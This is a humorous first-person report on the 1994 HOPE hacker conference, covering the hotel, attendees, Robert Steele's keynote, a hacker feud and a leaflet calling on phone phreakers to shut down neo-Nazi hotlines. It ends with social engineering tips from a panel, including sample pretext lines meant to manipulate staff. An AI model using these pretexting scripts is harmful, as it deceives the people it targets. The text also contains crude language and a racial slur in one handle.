+So,  it was my daily New York regimen to take the 8:15  into  the 
+city. If the train's on time I'll get to work by nine . . .
+
+Grand  Central Station - the grand old landmark thankfully  saved 
+by  the late Jackie O. - is the nexus for a few  hundred  million 
+commuters  who congregate in New York Shitty for no other  reason 
+that to collect a paycheck to afford blood pressure medicine.  
+
+You  have  to understand that New York  is  different.   Imagine, 
+picture  in your mind: nothing is so endearing as to watch  thou
+sands of briefcase carrying suits scrambling like ants in a  Gary 
+Larson cartoon for the nearest taxi, all the while greeting their 
+neighbors with the prototypical New York G'day! 
+
+With both fists high in the air, middle fingers locked into erect 
+prominence,  a  cacophonous  chorus of   "Good  Fucking  Morning" 
+brightens  the  day  of a true New Yorker.   His  bloodshot  eyes 
+instantly clear, the blood pressure sinks by 50% and already  the 
+first conflict of the day has been waged and won.
+
+Welcome to the Big Apple, and remember never, ever, to say, "Have 
+a Nice Day."  Oh, no.  Never.
+
+So  HOPE was bound to be radically different from Vegas's  DefCon 
+II,  if  only for the setting.  But, I expected hard  core.   The 
+European  contingent  will  be there, as will  Israel  and  South 
+America and even the Far East. All told, I am told, 1000 or  more 
+are  expected.   And again, as at DefCon II, I am to  speak,  but 
+Eric/Emmanuel never told me about what, when, or any of the other 
+niceties that go along with this thing we call a schedule.
+
+* * * * *
+
+God, I hate rushing.  
+
+Leaving  Vienna at 3:15 for a 4PM Amtrak "put your life in  their 
+hands" three hour trip to New York is not for the faint of heart.  
+My rented Hyundai four cylinder limousine wound up like a  sewing 
+machine  to 9,600 RPM and hydroplaned the bone dry route 66  into 
+the  pot holed, traffic hell of Friday afternoon Washington,  DC.   
+Twelve minutes to spare.
+ 
+I made the 23 mile trip is something less than three minutes  and 
+bounded  into  the Budget rental return, decelerated  to  impulse 
+power  and  let  my brick and lead filled suitcase  drop  to  the 
+pavement with a dent and a thud.  "Send me the bill," I  hollered 
+at  the attendant.  Never mind that Budget doesn't offer  express 
+service like real car rental companies.  "Just send me the bill!" 
+and I was off.
+
+Eight minute to spare.  Schlepp, schlepp. Heavy, heavy. 
+
+Holy shit! Look at the line for tickets and I had reservations.  
+
+"Is  this  the  line for the four o'clock to  New  York?"   Pant, 
+breathless.
+
+"Yeah."  She never looked up.  
+
+"Will they hold the train?"
+
+"No." A resoundingly rude no at that.  Panic gene takes over.  
+
+"What about the self-ticketing computer?" I said pointing at  the 
+self ticketing computer.
+
+"Do you have a reservation?"  
+
+"Yup."  Maybe there is a God.
+
+"Won't help you."
+
+"What?"
+
+Nothing.
+
+"What do you mean won't help?"
+
+"Computer's  broken."  Criminy! I have 4 minutes and here's  this 
+over-paid  over-attituded  Amtrak employee who thinks  she's  the 
+echo of Whoopi Goldberg.  "The line's over there."
+
+Have you ever begged? I mean really begged?  Well I have.
+
+"Are you waiting for the four?"  "Can I slip ahead?"  "Are you in 
+a  death defying hurry?"  "I'll give you a dime for your spot  in 
+line."  "You are so pretty for 76, ma'am.  Can I sneak ahead?"  
+
+Tears work.  Two excruciating minutes to go.  I bounced ahead  of 
+everyone in a line the length of the Great Wall of China, got  my 
+tickets  and  tore ass through Union Station   The  closing  gate 
+missed  me but caught the suitcase costing me yet more time as  I 
+attempted to disgorge my now-shattered valise from the fork-lift-
+like spikes which protect the trains from late-coming  commuters.  
+The  rubber edged doors on the train itself were kinder and  gen
+tler,  but at this point, screw it.  It was Evian and Fritos  for 
+the next three hours. 
+
+* * * * *
+
+Promises  tend to be lies.  The check is in the mail; Dan  Quayle 
+will learn to spell; I won't raise taxes.  I wonder about HOPE.
+
+"It's  going to be Bust Central," said one prominent  hacker  who 
+threatened  me with electronic assassination if I used his  name.  
+"Emmanuel will kill me."   Apparently the authorities-who-be  are 
+going to be there in force.  "They want to see if Corrupt or  any 
+of  the MoD crew stay after dark, then Zap! Back to jail.   (gig
+gle, giggle.)  I want to see that."  
+
+Will Mitnick show up?  I'd like to talk to that boy.  A  thousand 
+hackers  in one place and Eric/Emmanuel egging on the Feds to  do 
+something  stupid.  Agent Steal will be there, or  registered  at 
+least, and half of the folks I know going are using aliases.
+
+"I'd like a room please."
+
+"Yessir. Name?"
+
+"Monkey Meat."
+
+"Is that your first or last name?"
+
+"First."
+
+"Last name?"
+
+"Dilithium Crystal."
+
+"Could you spell that?"
+
+Now:   I  know the Hotel Pennsylvania.  It used to  be  the  high 
+class  Statler Hilton until Mr. Hilton himself decided  that  the 
+place  was beyond hope.  "Sell it or scuttle it."  They sold  and 
+thus  begat the hotel Filthadelphia.  I stayed here once in  1989 
+and  it  was a cesspool then.  I wondered  why  the  Farsi-fluent 
+bellhop  wouldn't  tell me how bad the damage was from  the  fire 
+bombed 12th floor.  The carpets were the same dingy, once upon  a 
+time colorful, drab as I remembered.  And, I always have a bit of 
+trouble  with a hotel who puts a security check by  the  elevator 
+bank.  Gives you the warm and fuzzies that make you want to  come 
+back right away.  
+
+I  saved $2 because none of the bell hops noticed I needed  help, 
+but then again, it wouldn't have mattered for there was no way he 
+and  I and my luggage were going to fit inside of what the  hotel 
+euphemistically refers to as a 'room'.  Closet would be kind  but 
+still inaccurate.  I think the word, ah, '$95 a night slum' might 
+still  be overly generous.  Let's try . . . ah ha! the room  that 
+almost survived the fire bombing.  Yeah, that's the ticket.
+
+The  walls were pealing.  Long strips of yellowed  antique  wall
+paper  embellished the flatness of the walls as they  curled  to
+wards the floor and windows.  The chunks of dried glue  decorated 
+the pastel gray with texture and the water stains from I know not 
+where  slithered  their way to the soggy carpet in  fractal  pat
+terned  rivulets.   I stood in awe at early funk motif  that  the 
+Hotel  Filthadelphia  chose in honor of my  attendance  at  HOPE.  
+But,  no  matter how bad my room was, at least  it  was  bachelor 
+clean.  (Ask your significant other what that means. . .)
+
+In  one hacker's room no bigger than mine I counted  13  sleeping 
+bags  lying amongst the growing mold at the intersection  of  the 
+drenched  wallboard  and putrefying carpet shreds. (God,  I  love 
+going  to hacker conferences!  It's not that I like  Hyatt's  and 
+Hilton' all that much: I do prefer the smaller facilities, but, I 
+am sad to admit, clean counts at my age.).  My nose did not  have 
+to  venture towards the floor to be aware that the Hotel  Filtha
+delphia  was  engaging  in top  secret  exobiological  government 
+experiments bent on determining their communicability and  infec
+tion factor.
+
+The  top  floor of the Hotel Filthadelphia - the 18th -  was  the 
+place  for  HOPE, except the elevator door  wouldn't  open.   The 
+inner door did, but even with the combined strength of my person
+al crowbar (a New York defensive measure only; I never use it  at 
+home) and three roughians with a bad case of Mexican Claustropho
+bia, we never got the door open.  
+
+The guard in the lobby was a big help. 
+
+"Try again."
+
+Damned  if  he didn't know his elevators and I emerged  into  the 
+pre-HOPE chaos of  preparing for a conference.
+
+About  100 hackers lounged around in varying forms of disarray  - 
+Hey Rop!
+
+Rop Gongrijjp editor of the Dutch Hacktic is a both a friend  and 
+an occasional source of stimulating argument.  Smart as a whip, I 
+don't  always agree with him, though, the  above-ground  security 
+types  ought  to talk to him for a clear,  concise  and  coherent 
+description of the whys and wherefores of hacking.  
+
+Hey Emmanuel!  Hey Strat!  Hey Garbage Heap!  Hey Erikb! Hey   to 
+lots of folks.  Is that you Supernigger?  And Julio?  I was  sur
+prised.   I knew a lot more of these guys that I thought  I  did. 
+Some indicted, some unindicted, some mere sympathizers and  other 
+techno-freaks  who  enjoy  a weekend  with  other  techno-freaks. 
+Security  dudes  - get hip!  Contact your local hacker  and  make 
+friends.  You'll be glad you did.
+
+>From  behind - got me.  My adrenaline went  into  super-saturated 
+mode as I was grabbed.  I turned and it was . . . Ben.  Ben is  a 
+hugger.  "I just wanted to hug you," he said sweetly but  without 
+the  humorous sexually deviant connotation that  occurred  during 
+Novocain's  offer  to let Phil Zimmerman sleep with  him  in  Las 
+Vegas.
+
+I  smiled a crooked smile.  "Yeah, right."  Woodstock '94  was  a 
+mere  120 miles away . . .maybe there was a  psychic  connection.  
+But  Ben was being sincere.  He was hugging everyone.   Everyone.  
+At  17, he really believes that hugging and hacking are  next  to 
+Godliness.   Boy does he have surprise coming the first time  his 
+mortgage is late.  Keep hugging while you have the chance, Ben.
+
+Assorted cases of Zima (the disgusting Polish is-this-really-lime 
+flavored  beer of choice by those without taste  buds)  appeared, 
+but  anyone over the age of 21 drank Bud. What about the 12  year 
+olds drinking?  And the 18 year olds?  And the 16 year olds?
+
+"Rop, I don't think you need to give the hotel an excuse to  bust 
+you  guys outta here."  Me, fatherly and  responsible?   Stranger 
+things have happened.  The beer was gone.  I'm not a  teetotaler, 
+but  I didn't want my weekend going up in flames because of  some 
+trashed  16 year old puking on an Irani ambassador in the  lobby. 
+No reason to test fate. 
+
+* * * * * 
+
+Nothing worked, but that's normal.  
+
+Rop  had  set  up HEU (Hacking at the End of   the  Universe)  in 
+Holland last year with a single length of 800m ethernet.  (That's 
+meter  for the Americans: about 2625 ft.)  HOPE, though was  dif
+ferent.  The Hotel Filthadelphia's switchboard and phone  systems 
+crashed  every  half hour or so which doesn't do a  lot  for  the 
+health of 28.8 slip lines.  
+
+The  object of the exercise was seemingly simple:  plug  together 
+about  20 terminals into a terminal server connected to  Hope.Com 
+and  let  'em go at it.  Provide 'net access and,  to  the  lucky 
+winner of the crack-the-hopenet server (root) the keys to a  1994 
+Corvette!
+
+You  heard  it right! For breaking into root of  their  allegedly 
+secure  server, the folks at 2600 are giving away keys to a  1994 
+Corvette.  They don't know where the car is, just the keys.   But 
+they will give you the car's last known location . . . or was  it 
+$50 in cash?
+
+Erikb - Chris Goggans - showed up late Friday night in  disguise: 
+a  baseball  cap over his nearly waist length dirty  blond  hair.  
+"He's here!" one could hear being muttered.  "He had the balls to 
+show  up!"  "He's gonna get his ass kicked to a pulp."   "So  you 
+did  come  . . . I was afraid they'd intimidated you to  stay  in 
+Texas."
+
+No way! "Why tell the enemy what your plans are."  Even the 50's-
+something ex-amphetamine-dealer turned reseller of public-records 
+Bootleg  didn't  know  Goggans was going to be  there.   But  the 
+multiple fans of Erikb, (a strong resemblance to Cyber Christ  if 
+he do say so himself) were a-mighty proud to see him.
+
+This  stunning Asian girl with skin too soft to touch (maybe  she 
+was  14, maybe she was 25) looked at Erikb by the message  board.  
+"You're," she pointed in disbelief "Erikb?"  Chris nods,  getting 
+arrogantly used to the respectful adulation.  Yeah, that's me, to 
+which  the  lady/girl/woman instantly replied,  "You're  such  an 
+asshole."  Smile, wide smile, hug, kiss, big kiss.  Erikb  revels 
+in the attention and hundreds of horny hackers jealously look on.
+
+Friday night was more of an experience - a Baba Ram Dass-like  Be 
+Here Now experience - with mellow being the operative word.   The 
+hotel  had apparently sacrificed 20,000 square feet of its  pent
+house  to hackers, but it was obvious to see they  really  didn't 
+give  a  damn  if the whole floor got  trashed.   Ceiling  panels 
+dripped from their 12 foot lofts making a scorched Shuttle under
+belly look pristine.  What a cesspool!  I swear nothing had  been 
+done  to the decorative environs since the day Kennedy was  shot.  
+But  kudos to Emmanuel for finding a centrally  located  cesspool 
+that undoubtedly gave him one hell of a deal. I think it would be 
+a  big mistake to hold a hacker conference at the Plaza  or  some 
+such snooty overly-self-indulgent denizen of the rich. 
+
+Filth sort of lends credibility to an event that otherwise  seeks 
+notoriety.  
+
+I didn't want to take up too much of Emmanuel's and Rop's time  - 
+they were in setup panic - so it was off to the netherworld until 
+noon.  That's when a civilized Con begins.
+
+* * * * * 
+
+I  dared to go outside; it was about 11AM and I was in search  of 
+the perfect New York breakfast: a greasy spoon that serves coffee 
+as  tough  as tree bark and a catatonia inducing  egg  and  bacon 
+sandwich.  Munch, munch, munch on that coffee.
+
+I'd forgotten how many beggars hang out on the corner of 33rd and 
+7th, all armed with the same words, "how about a handout,  Winn?"  
+How the hell do they know my name?  "Whatever you give will  come 
+back to you double and triple . . . please man, I gotta eat."  It 
+is sad, but John Paul Getty I ain't.  
+
+As  I  munched on my coffee and sipped my  runny  egg-sandwich  I 
+noticed that right in front of the runny-egg-sandwich place sat a 
+Ford  Econoline van. Nice van.  Nice phone company van. What  are 
+they doing here? Oh, yeah, the hackers need lines and the switch
+board  is  down.   Of course, the phone company  is  here.   But, 
+what's  that? Hello? A Hacker playing in the phone van? I  recog
+nize  you! You work with Emmanuel.  How?  He's robbing  it.   Not 
+robbing, maybe borrowing.  
+
+The  ersatz telephone van could have fooled anyone - even  me,  a 
+color blind quasi-techno-weanie to yell "Yo! Ma Bell!"  But, upon 
+not-too-closer inspection, the TPC (The Phone Company) van was in 
+fact  a  2600  van  - straight from the  minds  of  Emmanuel  and 
+friends.  Impeccable!  The telephone bell in a circle logo is, in 
+this  case, connected via cable to a hacker at a  keyboard.   The 
+commercial plates add an additional air of respectability to  the 
+whole image.  It works.
+
+* * * * *
+
+Up to HOPE - egg sandwich and all.
+
+The  keynote  speech was to be provided courtesy of  the  Man  in 
+Blue.   Scheduled  for noon, things were getting off  to  a  late 
+start.   The media (who were there in droves, eat your heart  out 
+CSI)  converged  on  the MIB to see who and why  someone  of  his 
+stature  would  (gasp!) appear/speak at  a  funky-downtown  hotel 
+filled  with  the  scourges of Cyberspace. I didn't  see  if  Ben 
+hugged the MIB, but I would understand if he didn't.  Few  people 
+knew  him or suspected what size of Jim-Carey-MASK arsenal  might 
+suddenly appear if a passive hug were accidentally interpreted as 
+being too aggressive. The MIB is imposing and Ben too shy.
+
+The  media can ask some dumb questions and write some dumb  arti
+cles  because they spend 12 1/2 minutes trying to  understand  an 
+entire culture.  Can't do that fellows!  
+
+The  MIB, though, knows hackers and is learning about  them  more 
+and  more; and since he is respectable, the media asks him  about 
+hackers.  What are hackers?  Why are YOU here, Mr. MIB?
+
+"Because they have a lot to offer.  They are the future," the Man 
+In Blue said over and over.  Interview after interview - how time 
+flies  when  you're having fun - and the lights and  cameras  are 
+rolling from NBC and PIX and CNN and assorted other channels  and 
+magazines.   At  12:55 chaos had not settled down  to  regimented 
+disorganization and the MIB was getting antsy.  After all, he was 
+a military man and 55 minutes off schedule: Egad! Take charge.  
+
+The MIB stood on a chair and hollered to the 700+ hacker  phreaks 
+in the demonstration ballroom, "Hey! It's starting.  Let's go the 
+theater and get rocking! Follow me."  He leaned over to me:   "Do 
+you know where the room is?" 
+
+"Sure, follow me."
+
+"Everyone  follow,  c'mon," yelled the MIB.  "I'm  going  to  get 
+started  in exactly three minutes," and three minutes  he  meant.  
+Despite the fact that I got lost in a hallway and had hundreds of 
+followers  following  my missteps and the MIB yelling at  me  for 
+getting lost in a room with only two doors, we did make the  main 
+hall,  and  within 90 seconds he took over the podium  and  began 
+speaking.  
+
+"I bet you've always wanted to ask a spy a few questions.  Here's 
+your chance.  But let me say that the United States  intelligence 
+community needs help and you guys are part of the solution."  The 
+MIB was impeccably dressed  in his pin stripe with only traces of 
+a  Hackers  80 T-shirt leaking through his starched  white  dress 
+shirt.   The MIB is no less than Robert Steele, ex-CIA type  spy, 
+senior  civilian in Marine Corps Intelligence and now the  Presi
+dent of Open Source Solutions, Inc.  
+
+He  got these guys (and gals) going.  Robert doesn't mince  words 
+and that's why as he puts it, he's "been adopted by the hackers."  
+At his OSS conferences he has successfully juxtaposed hackers and 
+senior  KGB officials who needed full time security during  their 
+specially  arranged 48 hour visa to Washington, DC.   He  brought 
+Emmanuel  and  Rop and clan to his show and since  their  agendas 
+aren't all that different, a camaraderie was formed.
+
+Robert MIB Steele believes that the current intelligence  machin
+ery is inadequate to meet the challenges of today's world.   Over 
+80%  of the classified information contained with  the  Byzantine 
+bowels of the government is actually available from open sources.  
+We  need to realize that the future is more of an open book  than 
+ever before.
+
+We classify newspaper articles from Peru in the incredibly  naive 
+belief  that  only Pentagon spooks subscribe.   We  classify  BBC 
+video  tapes from the UK with the inane belief that no  one  will 
+watch  it  if  it so stamped.  We classify  $4  Billion  National 
+Reconnaissance  Office satellite generated street maps of  Calle, 
+Colombia  when anyone with an IQ only slightly above a  rock  can 
+get  the  same  one from the tourist office.   And  that's  where 
+hackers come in.
+
+"You guys are a national resource.  Too bad everyone's so  scared 
+of you."  Applause from everywhere.  The MIB knows how to massage 
+a crowd.  Hackers, according to Steele, and to a certain extent I 
+agree,  are  the  truth tellers "in a  constellation  of  complex 
+systems run amok and on the verge of catastrophic collapse."  
+
+Hackers  are the greatest sources of open source  information  in 
+the world.  They have the navigation skills, they have the  time, 
+and  they have the motivation, Robert says.  Hackers  peruse  the 
+edges  of technology and there is little that will stop  them  in 
+their efforts.  The intelligence community should take  advantage 
+of the skills and lessons that the hackers have to teach us,  yet 
+as we all know, political and social oppositions keep both  sides 
+(who are really more similar then dissimilar) from talking.  
+
+"Hackers  put  a mirror up to the technical  designers  who  have 
+built the networks, and what they see, they don't like.   Hackers 
+have  shown  us all the chinks in the armor of  a  house  without 
+doors or windows.  The information infrastructure is fragile  and 
+we had better do something about it now; before it's too late."  
+
+Beat them at their own game, suggests Steele.  Keep the doors  of 
+Cyberspace  open, and sooner or later, the denizens of the  black 
+holes of information will have to sooner or late realize that the 
+cat is out of the bag.
+
+Steele educated the Hacker crowd in a way new to them:  he treat
+ed  them with respect, and in turn he opened a channel of  dialog 
+that  few above ground suit-types have ever  envisioned.   Steele 
+works at the source.
+
+HOPE had begun and Robert had set the tone.
+
+* * * * * 
+
+The  day was long.  Dogged by press, hackers rolled over  so  the 
+reporters  could tickle their stomachs on camera.  Despite  their 
+public allegations that the media screws it up and never can  get 
+the  story right, a camera is like a magnet.  The New York  Times 
+printed  an article about HOPE so off the wall I wondered if  the 
+reporter  had actually been there.  Nonetheless, the crowds  fol
+lowed  the  cameras,  the cameras followed the  crowds,  and  the 
+crowds  parted like the Red Sea.  But these were mighty  colorful 
+crowds.
+
+We  all hear of that prototypical image of the acne faced,  Jolt-
+drinking,  pepperoni  downing nerdish teenager  who  has  himself 
+locked  in  the  un-air-conditioned attic of  his  parents'  half 
+million  dollar house from the time school gets out till the  sun 
+rises. Wrongo security-breath.  Yeah, there's that component, but 
+I was reminded of the '80's, the early '80's by a large  percent
+age of the crowd.
+
+Purple  hair  was present but scarce, and I swear on a  stack  of 
+2600's that Pat from Saturday Night Live was there putting every
+one's hormonal guess-machines to the test.  But what cannot  help 
+but  capture one's attention is a 40 pin integrated  circuit  in
+serted  into  the  shaved side skull of  an  otherwise  clean-cut 
+Mohawk haircut.  
+
+The story goes that Chip Head went to a doctor and had a pair  of 
+small  incisions placed in his skull which would hold  the  leads 
+from  the chip.  A little dab of glue and in a few days the  skin 
+would  grow  back to hold the 40 pins in the natural  way;  God's 
+way.
+
+There  was a time that I thought ponytails were 'out' and  passe, 
+but  I thought wrong.  Mine got chopped off in roughly 1976  down 
+to shoulder length which remained for another six years, but half 
+of the HOPE audience is the reason for wide spread poverty in the 
+hair salon industry.
+
+Nothing  wrong with long, styled, inventive, outrageous  hair  as 
+long  as it's clean; and with barely an exception, such  was  the 
+case.   In New York it's not too hard to be perceived  as  clean, 
+especially  when you consider the frame of reference. Nothing  is 
+too weird.
+
+The energy level of HOPE was much higher than the almost  lethar
+gic (but good!) DefCon II.  People move in a great hurry, perhaps 
+to  convey  the  sense of importance to others, or  just  out  of 
+frenetic  hyperactivity.  Hackers hunched over their keyboards  - 
+yet with a sense of urgency and purpose. Quiet yet highly animat
+ed  conversations  in all corners.  HOPE staff  endlessly  pacing 
+throughout  the  event with their walkie-talkies glued  to  their 
+ears.  
+
+Not many suit types.  A handful at best, and what about the Feds?  
+I  was accosted a few times for being a Fed, but word spread:  no 
+Fed,  no bust.  Where were the Feds?  In the lobby.  The  typical 
+NYPD  cop  has  the distinctive reputation  of  being  overweight 
+especially when he wearing two holsters - one for the gun and one 
+for  the Italian sausage. Perpetually portrayed as donut  dunking 
+dodo's,  some New York cops' asses are referred to as the  Fourth 
+Precinct and a few actually moonlight as sofas.
+
+So  rather than make a stink, (NY cops hate to make a scene)  the 
+lobby  of the Hotel Filthadelphia was home to the  Coffee  Clutch 
+for  Cops.   About  a  half dozen of  them  made  their  profound 
+presence known by merely spending their day consuming mass  quan
+tities  of  questionable  ingestibles, but  that  was  infinitely 
+preferable to hanging out on the 18th floor.  The hackers weren't 
+causing any trouble, the cops knew that, so why push it.  Hackers 
+don't fight, they hack.  Right?
+
+After hours of running hours behind schedule, the HOPE conference 
+was  in  first  place for disorganized, with DefCon  II  not  far 
+behind.   Only  with 1000 people to keep happy and in  the  right 
+rooms,  chaos  reigns sooner.  The free Unix sessions  and  Pager 
+session  and open microphone bitch session and the  unadulterated 
+true history of 2600 kept audiences of several hundred  hankering 
+for more - hour after hour.  
+
+Over by the cellular hacking demonstrations, I ran into a  hacker 
+I  had written about: Julio, from the almost defunct  Masters  of 
+Destruction.  Julio had gone state's evidence and was prepared to 
+testify against MoD ring leader Mark Abene (aka Phiber Optik) but 
+once Mark pled guilty to enough crimes to satisfy the Feds, Julio 
+was  off  the hook with mere probation.  Good guy, sworn  off  of 
+hacking.  Cell phones are so much more interesting.
+
+However,  while standing around with Erikb and a gaggle of  Cyber 
+Christ wanna-bes, Julio and his friend (who was the size of Texas 
+on  two legs) began a pushing match with Goggans.   "You  fucking 
+narc  red-neck  son of a bitch."  Goggans helped build  the  case 
+against the MoD and didn't make a lot of friends in the process.
+
+The  shoving  and shouldering reminded me of  slam  dancing  from 
+decades past, but these kids are too young to have taken part  in 
+the social niceties of deranged high speed propulsion and  revul
+sion on the dance floor.  So it was a straight out pushing match, 
+which found Erikb doing his bloody best to avoid.  Julio and  pal 
+kept a'coming and Erikb kept avoiding.  It took a dozen of us  to 
+get  in the middle and see that Julio was escorted to the  eleva
+tors.
+
+Julio  said Corrupt, also of the MoD,  was coming down  to  HOPE, 
+too.  Corrupt has been accused of mugging drug dealers to finance 
+his computer escapades, and was busted along with the rest of the 
+MoD  gang.   The  implied threat was taken  seriously,  but,  for 
+whatever  reason,  Corrupt  never showed.  It is  said  that  the 
+majority of the hacking community distances itself from him; he's 
+not  good  for  the collective reputation.  So  much  for  hacker 
+fights.  All is calm.
+
+The evening sessions continued and continued with estimates of as 
+late  as 4AM being bandied about. Somewhere around 1:00AM  I  ran 
+into  Bootleg  in the downstairs bar. Where was  everybody?   Not 
+upstairs.   Not in the bar.  I saw a Garbage Heap in  the  street 
+outside (now that's a double entendre) and then Goggans popped up 
+from  the door of  the Blarney Stone, a syndicated chain of  low-
+class Irish bars that serve fabulously thick hot sandwiches.  
+
+"We're about to get thrown out."
+
+"From  the  Blarney Stone?  That's impossible.  Drunks  call  the 
+phone booths home!"
+
+Fifty or so hacker/phreaks had migrated to the least likely, most 
+anachronistic  location one could imagine.  A handful of  drunken 
+sots leaning over their beers on a stain encrusted wooden  breed
+ing  ground  for salmonella.  A men's room that hasn't  seen  the 
+fuzzy end of a brush for the best part of a century made  Turkish 
+toilets appear refreshingly clean.  And they serve food here.
+
+I didn't look like a hacker so I asked the bartender, "Big crowd, 
+eh?"
+
+The  barrel  chested beer bellied  barman  nonchalantly  replied, 
+"nah.  Pretty usual."  He cleaned a glass so thoroughly the water 
+marks stood out plainly.
+
+"Really?   This  much action on a Saturday night on a  dark  side 
+street so questionably safe that Manhattan's Mugger Society posts 
+warnings?"
+
+"Yup."
+
+"So," I continued.  "These hackers come here a lot?"
+
+"Sure do," he said emphatically.
+
+"Wow.  I didn't know that.  So this is sort of a hacker bar,  you 
+might say?"
+
+"Exactly.   Every Saturday night they come in and raise a  little 
+hell."
+
+With  a  straight face I somehow managed to  thank  the  confused 
+barman  for  his help and for the next four  hours  learned  that 
+socially, hackers of today are no different than many if not most 
+of  us were in our late teens ad early twenties.  We laughed  and 
+joked  and  so  do they - but there is more  computer  talk.   We 
+decried the political status of our day as they do theirs, albeit 
+they   with less fervor and more resignation.   The  X-Generation 
+factor:  most  of them give little more than a  tiny  shit  about 
+things  they view as being totally outside their control, so  why 
+bother.  Live for today.  
+
+Know they enemy.  Robert hung in with me intermingling and  argu
+ing  and  debating  and learning from them,  and  they  from  us.  
+Hackers aren't the enemy - their knowledge is - and they are  not 
+the  exclusive holders of that information.  Information  Warfare 
+is about capabilities, and no matter who possesses that capabili
+ty, there ought to be a corresponding amount respect. 
+
+Indeed,  rather than adversaries, hackers could well become  gov
+ernment allies and national security assets in an intense  inter
+national  cyber-conflict.   In the LoD/MoD War  of  1990-91,  one 
+group of hackers did help authorities. Today many hackers  assist 
+professional organizations, governments in the US and overseas  - 
+although  very  quietly.   'Can't be  seen  consorting  with  the 
+enemy.'    Is hacking from an Army or Navy or NATO base  illegal?  
+Damned  if I know, but more than one Cyber Christ-like  character 
+makes  a  tidy sum providing hands-on hacking  education  to  the 
+brass in Europe.  
+
+Where  these guys went after 5AM I don't know, but I was  one  of 
+the first to be back at the HOPE conference later that day; 12:30 
+PM Sunday.
+
+* * * * * 
+
+The Nazi Hunters were out in force.
+
+"The Neo-Nazi skinheads are trying to start another Holocaust." A 
+piercing, almost annoying voice stabbed right through the crowds.  
+"Their racist propaganda advocates killing Jews and blacks.  They 
+have to be stopped, now."
+
+Mortechai Levy (I'll call him Morty) commanded the attention of a 
+couple  dozen  hackers.  Morty was a  good,  emotional,  riveting 
+shouter.  "These cowardly bastards have set up vicious hate  call 
+lines  in  over 50 cities.  The messages advocate  burning  syna
+gogues, killing minorities and other violence.  These phones have 
+to be stopped!"
+
+The ever-present leaflet from Morty's Jewish Defense Organization 
+asked for help from the 2600 population.  
+
+     "Phone  freaks  you must use your various  assorted  bag  of 
+     tricks  to  shut these lines down. No  cowardly  sputterings 
+     about 'free speech' for these fascist scum."  
+
+The headline invited the hacker/phreak community to:
+
+               "Let's Shut Down 'Dial-A-Nazi'!!!"
+
+Morty was looking for political and technical support from a band 
+of  nowhere  men and women who largely don't know  where  they're 
+going  much  less care about an organized political  response  to 
+someone  elses cause.  He wasn't making a lot of headway, and  he 
+must  have  know that he would walk right  into  the  anarchist's 
+bible: the 1st amendment.
+
+The  battle  lines had been set.  Morty wanted to see  the  Nazis 
+censored  and  hackers are absolute freedom of speechers  by  any 
+measure.  Even Ben sauntering over for a group hug did little  to 
+defuse the mounting tension.
+
+I  couldn't help but play mediator. Morty was belligerently  loud 
+and being deafeningly intrusive which affected the on-going  ses
+sions.  To tone it down some, we nudged Morty and company off  to 
+the  side  and occupied a corner of thread bare  carpet,  leaning 
+against a boorish beige wall that had lost its better epidermis.  
+
+The  heated  freedom  of speech versus the  promotion  of  racial 
+genocide rancor subdued little even though we were all buns  side 
+down.  I tried to get a little control of the situation.
+
+"Morty. Answer me this so we know where you're coming from.   You 
+advocate the silencing of the Nazis, right?
+
+"They're planning a new race war; they have to be stopped."
+
+"So  you  want  them silenced.  You say their  phones  should  be 
+stopped and that the hackers should help."
+
+"Call  that  number  and they'll tell you that  Jews  and  blacks 
+should be killed and then they . . ."
+
+"Morty.  OK, you want to censor the Nazis.  Yes or No."
+
+"Yes."
+
+"OK,  I can understand that.  The question really is, and I  need 
+your help here, what is the line of censorship that you advocate.  
+Where is your line of legal versus censored?"
+
+A  few more minutes of political diatribe and then he got to  the 
+point.  "Any group with a history of violence should be  censored 
+and stopped."  A little imagination and suddenly the whole planet 
+is silenced.  We need a better line, please.  "Hate group, Nazis, 
+people   who   advocate   genocide  .  .   .   they   should   be 
+silenced . . . ."
+
+"So,"  I  analyzed.  "You want to establish  censorship  criteria 
+based  upon  subjective interpretation.   Whose  interpretation?"  
+My approach brought nods of approval.
+
+One  has to admire Morty and his sheer audacity and tenacity  and 
+how  much  he strenuously and single-mindedly drives  his  points 
+home.   He  didn't have the ideal sympathetic  audience,  but  he 
+wouldn't give an inch.  Not an inch.  A little self righteousness 
+goes  a long way; boisterous extremism grows stale.   It  invites 
+punitive  retorts  and  teasing, or  in  counter-culture  jargon, 
+"fucking with their heads."
+
+Morty  (perhaps for justifiable reasons) was  totally  inflexible 
+and  thus  more prone to verbal barbing.  "You're just  a  Jewish 
+racist.   Racism in reverse," accused one jocular but  definitely 
+lower  middle  class hacker with an accent thicker  than  all  of 
+Brooklyn.    
+
+Incoming  Scuds!   Look  out! Morty went nuts and  as  they  say, 
+freedom  of  speech ends when my fists impacts  upon  your  nose.  
+Morty  came  dangerously  close to crossing  that  line.   Whoah, 
+Morty,  whoah.  He's just fucking with your head.  The  calm-down 
+brigade did its level best to keep these two mortals at  opposite 
+ends of the room. 
+
+"You  support  that  Neo Nazi down there; you're as  bad  as  the 
+rest!"  Morty  said. "See what I have to tolerate.  I  know  him, 
+we've been keeping track of him and he hangs out with the son  of 
+the  Grand  Wizard of Nazi Oz."  The paranoid train  got  on  the 
+tracks.  
+
+"Do you really know the Big Poo-bah of Hate?" I asked the  hacker 
+under assault and now under protective custody.
+
+"Yeah," he said candidly.  "He's some dick head who hates  every
+one.  Real jerk."
+
+"So what about you said to Morty over there?"
+
+"Just  fucking with his head.  He gets a little extreme."  So  we 
+had  in our midst the Al Sharpton of the Jewish  faith.   Ballsy. 
+Since Morty takes Saturday's off by religious law, he missed  the 
+press  cavalcade,  but as a radical New York fixture,  the  media 
+probably didn't mind too much.
+
+I was off to sessions, Morty found new audiences as they came off 
+the elevators, and the band played on.
+
+* * * * *
+
+In  my humble 40-something opinion, the best session of HOPE  was 
+the  one  on social engineering.  
+
+The  panel consisted of only Emmanuel, Supernigger (social  engi
+neer par excellence) and Cheshire Catalyst.  The first bits  were 
+pretty  staid dry conventional conference (ConCon) oriented,  but 
+nonetheless, not the kind of info that you expect to find William 
+H. Murray, Executive Consultant handing out.  
+
+The  best social engineers make friends of their victims.  Remem
+ber: you're playing a role.  Think Remington Steele.
+
+Schmooze!  "Hey,  Jack did you get a load of the blond  on  Stern 
+last night?"
+
+Justifiable anger: "Your department has caused nothing but  head
+aches.   These  damn new computers/phones/technology  just  don't 
+work like the old ones.  Now either you help me now or I'm  going 
+all the way to Shellhorn and we'll what he says about these kinds 
+of screwups."  A contrite response is the desired effect. 
+
+Butt  headed bosses: "Hey, my boss is all over my butt,  can  you 
+help me out?"
+
